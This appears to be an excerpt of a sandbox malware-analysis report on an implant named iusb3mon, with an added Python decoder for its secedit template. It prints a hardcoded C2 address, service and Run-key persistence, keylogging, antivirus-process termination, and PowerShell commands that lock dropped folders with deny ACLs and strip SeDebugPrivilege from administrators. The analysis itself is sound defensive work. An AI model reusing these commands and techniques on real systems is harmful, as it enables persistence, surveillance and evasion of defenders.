                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: c8193b292433f01626c4418c9c25c2c9538746e06b74d6296b5f2b2320ccbe65
                                                                                                                    • Instruction ID: 9ac9717d1705ada025104e2edc44bba456895e1cae37b640719b6f8d29fc9a9f
                                                                                                                    • Opcode Fuzzy Hash: c8193b292433f01626c4418c9c25c2c9538746e06b74d6296b5f2b2320ccbe65
                                                                                                                    • Instruction Fuzzy Hash: 16E0E531100A91A7D63327639C05B6E368D9F593A0F170122FC489E290CBA0CCC0C1E1
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExitThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2158977761-0
APIs
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: ExitThread
• String ID:
• API String ID: 2158977761-0
APIs
• SetFileAttributesA.KERNEL32(00000000,00000080,0624682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06241C88
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,202.79.169.178,00000000,75920F10,06246B62), ref: 062483A5
• GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 062483B6
• GetProcAddress.KERNEL32(?,GetModuleFileNameA), ref: 062483C3
• GetProcAddress.KERNEL32(?,CreateMutexA), ref: 062483D0
• GetProcAddress.KERNEL32(?,ReleaseMutex), ref: 062483DD
• GetProcAddress.KERNEL32(?,GetLastError), ref: 062483EA
• GetProcAddress.KERNEL32(?,CloseHandle), ref: 062483F7
• GetProcAddress.KERNEL32(?,Sleep), ref: 06248404
• GetProcAddress.KERNEL32(?,lstrcatA), ref: 06248411
• GetProcAddress.KERNEL32(?,GetTickCount), ref: 0624841E
• GetProcAddress.KERNEL32(?,WaitForSingleObject), ref: 0624842B
• GetProcAddress.KERNEL32(?,GetFileAttributesA), ref: 06248438
• GetProcAddress.KERNEL32(?,CreateEventA), ref: 06248445
• GetProcAddress.KERNEL32(?,ResetEvent), ref: 06248452
• GetProcAddress.KERNEL32(?,CancelIo), ref: 0624845F
• GetProcAddress.KERNEL32(?,SetEvent), ref: 0624846C
• GetProcAddress.KERNEL32(?,TerminateThread), ref: 06248479
• GetProcAddress.KERNEL32(?,GetVersionExA), ref: 06248486
• GetProcAddress.KERNEL32(?,GetExitCodeProcess), ref: 06248493
• GetProcAddress.KERNEL32(?,ExpandEnvironmentStringsA), ref: 062484A0
• GetProcAddress.KERNEL32(?,GetSystemInfo), ref: 062484AD
• GetProcAddress.KERNEL32(?,GetSystemDirectoryA), ref: 062484BA
• GetProcAddress.KERNEL32(?,MoveFileA), ref: 062484C7
• GetProcAddress.KERNEL32(?,MoveFileExA), ref: 062484D4
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: 202.79.169.178$ADVAPI32.dll$CancelIo$ChangeServiceConfig2A$CloseHandle$CloseServiceHandle$ControlService$CreateEventA$CreateMutexA$CreateProcessA$CreateProcessAsUserA$CreateServiceA$DeleteService$DuplicateTokenEx$EnumWindows$ExitWindowsEx$ExpandEnvironmentStringsA$GetCurrentProcess$GetExitCodeProcess$GetFileAttributesA$GetLastError$GetModuleFileNameA$GetSystemDirectoryA$GetSystemInfo$GetTickCount$GetVersionExA$IsWindowVisible$MSVCRT.dll$MessageBoxA$MoveFileA$MoveFileExA$OpenProcessToken$OpenSCManagerA$OpenServiceA$QueryServiceStatus$RegisterServiceCtrlHandlerA$ReleaseMutex$ResetEvent$SendMessageA$SetEvent$SetServiceStatus$SetTokenInformation$Sleep$StartServiceA$TerminateThread$User32.dll$WSACleanup$WSAIoctl$WSAStartup$WTSGetActiveConsoleSessionId$WaitForSingleObject$closesocket$connect$gethostbyname$gethostname$getsockname$htons$kernel32.dll$lstrcatA$memcpy$memset$recv$select$send$setsockopt$socket$strcmp$strlen$strstr$wininet.dll$ws2_32.dll$wsprintfA
• API String ID: 2238633743-379344981
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,202.79.169.178,0626CC34,00000000), ref: 06246DA1
• wsprintfA.USER32 ref: 06246E5A
• OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 06246E7F
• CreateServiceA.ADVAPI32(00000000,?,0626CA80,000F01FF,00000110,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 06246EB8
• LockServiceDatabase.ADVAPI32(00000000), ref: 06246EC5
• ChangeServiceConfig2A.ADVAPI32(?,00000001,0626CA80), ref: 06246EE9
• ChangeServiceConfig2A.ADVAPI32(?,00000002,00015180), ref: 06246F64
• UnlockServiceDatabase.ADVAPI32(?), ref: 06246F70
• GetLastError.KERNEL32 ref: 06246F7E
• OpenServiceA.ADVAPI32(?,?,000F01FF), ref: 06246F99
• StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 06246FAC
• StartServiceA.ADVAPI32(?,00000000,00000000), ref: 06246FBA
• RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 06246FFA
• lstrlenA.KERNEL32(06246D4E), ref: 06247003
• RegSetValueExA.ADVAPI32(?,Description,00000000,00000001,06246D4E,00000000), ref: 0624701A
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: Service$Open$ChangeConfig2DatabaseStart$CreateErrorFileLastLockManagerModuleNameUnlockValuelstrlenwsprintf
• String ID: 202.79.169.178$C:\Windows\svchost.exe$Description$SYSTEM\CurrentControlSet\Services\
• API String ID: 432064258-1740475274
APIs
• LoadLibraryA.KERNEL32(userenv.dll), ref: 062457A6
• GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 062457B7
• GetCurrentProcess.KERNEL32 ref: 062457FF
• OpenProcessToken.ADVAPI32(00000000,000F01FF,?), ref: 0624580F
• DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?), ref: 06245826
• LoadLibraryA.KERNEL32(Kernel32.dll,WTSGetActiveConsoleSessionId), ref: 06245836
• GetProcAddress.KERNEL32(00000000), ref: 06245839
• SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 0624584F
• CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000430,?,00000000,00000044,?), ref: 0624587B
• CloseHandle.KERNEL32(?), ref: 0624588D
• CloseHandle.KERNEL32(?), ref: 06245892
• FreeLibrary.KERNEL32(?), ref: 062458A0
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: LibraryProcessToken$AddressCloseHandleLoadProc$CreateCurrentDuplicateFreeInformationOpenUser
• String ID: CreateEnvironmentBlock$D$Kernel32.dll$WTSGetActiveConsoleSessionId$WinSta0\Default$userenv.dll
• API String ID: 1797627335-1926497751
APIs
• CreateMutexA.KERNEL32(00000000,00000000,KeyLogger), ref: 06242C05
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 06242C0E
• Sleep.KERNEL32(0000000A), ref: 06242C6E
• lstrlenA.KERNEL32(?), ref: 06242C7B
• GetKeyState.USER32(00000010), ref: 06242CD9
• GetAsyncKeyState.USER32(?), ref: 06242CEC
• GetKeyState.USER32(00000014), ref: 06242CF9
• GetKeyState.USER32(00000014), ref: 06242D25
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: State$AsyncCreateMutexObjectSingleSleepWaitlstrlen
• String ID: <BackSpace>$<Enter>$KeyLogger
• API String ID: 2104880762-1889060070
                                                                                                                    • Opcode ID: e691c9f66dbc9f676ac70837f89fbdf9c45f713bc5a9a3a0d10f4591459b0932
                                                                                                                    • Instruction ID: 91edc768257ea98d842e5a21f29c557d4307e2a6240f378abc477f90ada5dce2
                                                                                                                    • Opcode Fuzzy Hash: e691c9f66dbc9f676ac70837f89fbdf9c45f713bc5a9a3a0d10f4591459b0932
                                                                                                                    • Instruction Fuzzy Hash: A151D271D22729EFDFA8BBA6DC4CB9A7769AF40311F0140A1FE15A7180D6308B41CF62
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 06241F38: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,?,062462A3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Microsoft), ref: 06241F56
                                                                                                                      • Part of subcall function 06245CE6: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001,00000000), ref: 06245CF6
                                                                                                                      • Part of subcall function 06245CE6: Process32First.KERNEL32(00000000,?), ref: 06245D0F
                                                                                                                      • Part of subcall function 06245CE6: Process32Next.KERNEL32(00000000,00000128), ref: 06245D2A
                                                                                                                      • Part of subcall function 06245CE6: CloseHandle.KERNEL32(00000000,00000002,00000000,00000001,00000000), ref: 06245D4F
                                                                                                                    • WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'),00000000), ref: 062462D7
                                                                                                                    • WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P,00000000), ref: 062462DF
                                                                                                                    • WinExec.KERNEL32(powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA,00000000), ref: 062462E7
                                                                                                                    • Sleep.KERNEL32(00001388), ref: 06246301
                                                                                                                    • ExitWindowsEx.USER32(00000000,00000000), ref: 06246309
                                                                                                                    Strings
                                                                                                                    • C:\Windows\System32\SrpUxNativeSnapIn.dll, xrefs: 062462EB
                                                                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 06246294
                                                                                                                    • Microsoft, xrefs: 0624628F
                                                                                                                    • powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P, xrefs: 062462DA
                                                                                                                    • powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'), xrefs: 062462D2
                                                                                                                    • 360Tray.exe, xrefs: 062462BB
                                                                                                                    • 360tray.exe, xrefs: 062462AA
                                                                                                                    • powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA, xrefs: 062462E2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Exec$Process32$CloseCreateExitFirstHandleNextOpenSleepSnapshotToolhelp32Windows
                                                                                                                    • String ID: 360Tray.exe$360tray.exe$C:\Windows\System32\SrpUxNativeSnapIn.dll$Microsoft$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"')$powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA
                                                                                                                    • API String ID: 3961968786-728021376
                                                                                                                    • Opcode ID: ec5a8584e8616de7385493f1f74537583ef85d8ff2e5bf229387d500881e4c9a
                                                                                                                    • Instruction ID: 3acaa9d49b47391f775721b0f9487f09df05d2c12a9ebffd5f34ed5f5145628e
                                                                                                                    • Opcode Fuzzy Hash: ec5a8584e8616de7385493f1f74537583ef85d8ff2e5bf229387d500881e4c9a
                                                                                                                    • Instruction Fuzzy Hash: 74F05422BB43567596E832B77C8DEAB2E18DED7E65711051DFD24A14C4DE90C1C0CA72
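The three WinExec strings above hand PowerShell a secedit security template: two Set-Content calls write it as an array of lines (one for C:\ProgramData\Program, one for C:\ProgramData\Data), the third writes it again from Base64 to %TEMP%\SeDebugPrivilege4.inf, and the function then sleeps 0x1388 ms (5 seconds) and calls ExitWindowsEx(0, 0), which is EWX_LOGOFF. The Python below is an added example for reading those artefacts; it is not code from the sample or from the Joe Sandbox report. It decodes the Base64 prefix exactly as the report prints it (the report truncates the argument, so only the first template lines come back), parses the template lines quoted in the first Set-Content call, and expands the SDDL of the [File Security] entry into ACE type, inheritance flags, access mask and trustee. The right and SID abbreviations are the standard SDDL tables; nothing in the script is taken from the sample beyond the strings quoted in the report.

```python
"""Added example: decode the secedit template and the SDDL from the WinExec strings above."""
import base64
import csv
import re

# Base64 argument of [Convert]::FromBase64String exactly as the report shows it (truncated).
INF_B64_PREFIX = ("//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBb"
                  "AFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA")
# The Set-Content array from the first WinExec call, joined the way secedit expects it.
INF_FROM_REPORT = "\r\n".join([
    "[Unicode]", "Unicode=yes", "[Version]", 'signature="$CHICAGO$"', "Revision=1",
    "[Privilege Rights]", "SeDebugPrivilege = *S-1-5-18",
    "[File Security]", r'"C:\ProgramData\Program",0,"D:AR(D;OICI;DTSDRCWD;;;WD)"',
])

ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "AU": "SYSTEM_AUDIT"}
ACE_FLAGS = {"OI": "OBJECT_INHERIT", "CI": "CONTAINER_INHERIT", "NP": "NO_PROPAGATE_INHERIT",
             "IO": "INHERIT_ONLY", "ID": "INHERITED"}
DACL_FLAGS = {"P": "PROTECTED", "AR": "AUTO_INHERIT_REQ", "AI": "AUTO_INHERITED"}
# Two-letter SDDL right tokens; DT is bit 0x40, which is FILE_DELETE_CHILD on a file-system object.
RIGHTS = {"DT": ("FILE_DELETE_CHILD", 0x40), "SD": ("DELETE", 0x10000),
          "RC": ("READ_CONTROL", 0x20000), "WD": ("WRITE_DAC", 0x40000),
          "WO": ("WRITE_OWNER", 0x80000), "FA": ("FILE_ALL_ACCESS", 0x1F01FF),
          "GA": ("GENERIC_ALL", 0x10000000), "GR": ("GENERIC_READ", 0x80000000)}
# SDDL SID aliases; in the trustee field WD means Everyone, not WRITE_DAC.
SID_ALIASES = {"WD": "S-1-1-0", "BA": "S-1-5-32-544", "SY": "S-1-5-18", "AU": "S-1-5-11"}
# secedit [File Security] mode column.
FILE_SECURITY_MODES = {"0": "propagate inheritable permissions to subfolders and files",
                       "1": "replace permissions on all subfolders and files",
                       "2": "do not replace existing permissions"}


def decode_inf_blob(b64: str) -> str:
    """Base64 -> text. FF FE is the UTF-16LE byte-order mark of a [Unicode] template."""
    raw = base64.b64decode(b64)
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le")
    return raw.decode("utf-8")


def parse_inf(text: str) -> dict:
    """Split INF text into {section: [lines]}."""
    sections, current = {}, None
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = []
        elif current is not None:
            sections[current].append(line)
    return sections


def parse_privilege_rights(lines) -> dict:
    """'SeDebugPrivilege = *S-1-5-18' -> {'SeDebugPrivilege': ['S-1-5-18']}. secedit applies the
    list as the complete set of holders, so unlisted SIDs (Administrators by default) lose it."""
    rights = {}
    for line in lines:
        name, _, holders = line.partition("=")
        rights[name.strip()] = [h.strip().lstrip("*") for h in holders.split(",") if h.strip()]
    return rights


def _split_tokens(s: str, table: dict) -> list:
    """Split a run of SDDL flag tokens, preferring two-letter names; unknown tokens raise KeyError."""
    names, i = [], 0
    while i < len(s):
        tok = s[i:i + 2] if s[i:i + 2] in table else s[i]
        names.append(table[tok])
        i += len(tok)
    return names


def parse_rights(s: str):
    """'DTSDRCWD' -> (['FILE_DELETE_CHILD', 'DELETE', ...], combined access mask)."""
    names, mask = [], 0
    for i in range(0, len(s), 2):
        name, bits = RIGHTS[s[i:i + 2]]
        names.append(name)
        mask |= bits
    return names, mask


def parse_sddl_dacl(sddl: str) -> dict:
    """Parse 'D:<flags>(ace)...'; an ACE is type;flags;rights;object_guid;inherit_guid;trustee."""
    m = re.fullmatch(r"D:([A-Z]*)((?:\([^)]*\))*)", sddl)
    if not m:
        raise ValueError("only a DACL-only SDDL string is handled here")
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", m.group(2)):
        ace_type, flags, rights, _obj, _inh, sid = ace.split(";")
        names, mask = parse_rights(rights)
        aces.append({"type": ACE_TYPES[ace_type], "flags": _split_tokens(flags, ACE_FLAGS),
                     "rights": names, "mask": mask, "trustee": SID_ALIASES.get(sid, sid)})
    return {"flags": _split_tokens(m.group(1), DACL_FLAGS), "aces": aces}


def parse_file_security(lines) -> list:
    """'"path",mode,"SDDL"' rows -> [{'path', 'mode', 'dacl'}]."""
    return [{"path": path, "mode": FILE_SECURITY_MODES.get(mode, mode), "dacl": parse_sddl_dacl(sddl)}
            for path, mode, sddl in csv.reader(lines)]
```

What it shows: the ACE is a deny for Everyone (in the trustee position WD is the Everyone alias S-1-1-0, while the WD token in the rights field is WRITE_DAC) on FILE_DELETE_CHILD, DELETE, READ_CONTROL and WRITE_DAC, inherited by every file and subfolder (OI, CI) under C:\ProgramData\Program, and the second Set-Content call does the same for C:\ProgramData\Data. Because deny ACEs are evaluated before allows, nobody can delete the dropped folders, read their ACL or rewrite it through the normal path, which is self-protection for the payload. The [Privilege Rights] line, if the template is applied with secedit, makes LocalSystem (S-1-5-18) the only holder of SeDebugPrivilege and so removes it from Administrators, which hampers admin-level tools that need the privilege to inspect or terminate the implant. Two caveats: an administrator still holds SeTakeOwnershipPrivilege, so takeown followed by icacls /reset recovers the folders; and the strings visible in this function do not include a secedit /configure invocation, so the report does not show how, or whether, the template is applied.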
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 06248FF7: LoadLibraryA.KERNEL32(ADVAPI32.dll,00000000,SeShutdownPrivilege,?,?,062439FA,SeShutdownPrivilege,00000001,?,0624200F,?), ref: 0624900F
                                                                                                                      • Part of subcall function 06248FF7: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 0624901F
                                                                                                                      • Part of subcall function 06248FF7: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0624902A
                                                                                                                      • Part of subcall function 06248FF7: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 06249035
                                                                                                                      • Part of subcall function 06248FF7: LoadLibraryA.KERNEL32(kernel32.dll,?,062439FA,SeShutdownPrivilege,00000001,?,0624200F,?), ref: 0624903F
                                                                                                                      • Part of subcall function 06248FF7: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 0624904A
                                                                                                                      • Part of subcall function 06248FF7: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 06249092
                                                                                                                      • Part of subcall function 06248FF7: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0624909A
                                                                                                                      • Part of subcall function 06248FF7: CloseHandle.KERNEL32(?), ref: 062490A9
                                                                                                                      • Part of subcall function 06248FF7: FreeLibrary.KERNEL32(00000000), ref: 062490BA
                                                                                                                      • Part of subcall function 06248FF7: FreeLibrary.KERNEL32(00000000), ref: 062490C5
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 06243CAC
                                                                                                                    • Process32First.KERNEL32(?,00000128), ref: 06243CD5
                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?,?,00000128,00000002,00000000), ref: 06243CFA
                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 06243D07
                                                                                                                    • Process32Next.KERNEL32(?,00000128), ref: 06243D17
                                                                                                                    • CloseHandle.KERNEL32(?,?,00000128,?,00000128,00000002,00000000), ref: 06243D23
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryProc$Load$CloseFreeHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                    • String ID: SeDebugPrivilege$explorer.exe
                                                                                                                    • API String ID: 1212985741-2721386251
                                                                                                                    • Opcode ID: 5bb825bc5f5c0bc06ea0bd0fa4fcd670abdedf3df68749a4f320f4b02f455c89
                                                                                                                    • Instruction ID: 97305db9bfe4ce3374cb338bff9c6883bdb2d1ab1e0858931c6ac0a756594768
                                                                                                                    • Opcode Fuzzy Hash: 5bb825bc5f5c0bc06ea0bd0fa4fcd670abdedf3df68749a4f320f4b02f455c89
                                                                                                                    • Instruction Fuzzy Hash: D111A932524315BAEBA4BA61ED06FDEB7B9DB04710F100066FF45E50D0DB719A914E54
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 06242E31
                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 06242EBF
                                                                                                                    • DeleteFileA.KERNEL32(?,?,?,00000001), ref: 06242F67
                                                                                                                    • FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06242F7F
                                                                                                                    • FindClose.KERNEL32(00000000,?,?,00000001), ref: 06242F8E
                                                                                                                    • RemoveDirectoryA.KERNEL32(?,?,?,00000001), ref: 06242F97
                                                                                                                      • Part of subcall function 06254539: __EH_prolog.LIBCMT ref: 0625453E
                                                                                                                      • Part of subcall function 062431FE: __EH_prolog.LIBCMT ref: 06243203
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFindH_prolog$CloseDeleteDirectoryFirstNextRemove
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 360591376-438819550
                                                                                                                    • Opcode ID: d98ae5b2a6d3bb6ecbca7c81c7ea3ea0fc5a493c9b07df54d509d0f5133928ce
                                                                                                                    • Instruction ID: d9a3cc9023e3da995160b17b7b02cc3f032b63420ad22c404d42634ea69e104c
                                                                                                                    • Opcode Fuzzy Hash: d98ae5b2a6d3bb6ecbca7c81c7ea3ea0fc5a493c9b07df54d509d0f5133928ce
                                                                                                                    • Instruction Fuzzy Hash: 6341AF71D2120AEADB99FBA5DC88EEEB778AF18310F404159FD25E7190DB349B44CB50
                                                                                                                    APIs
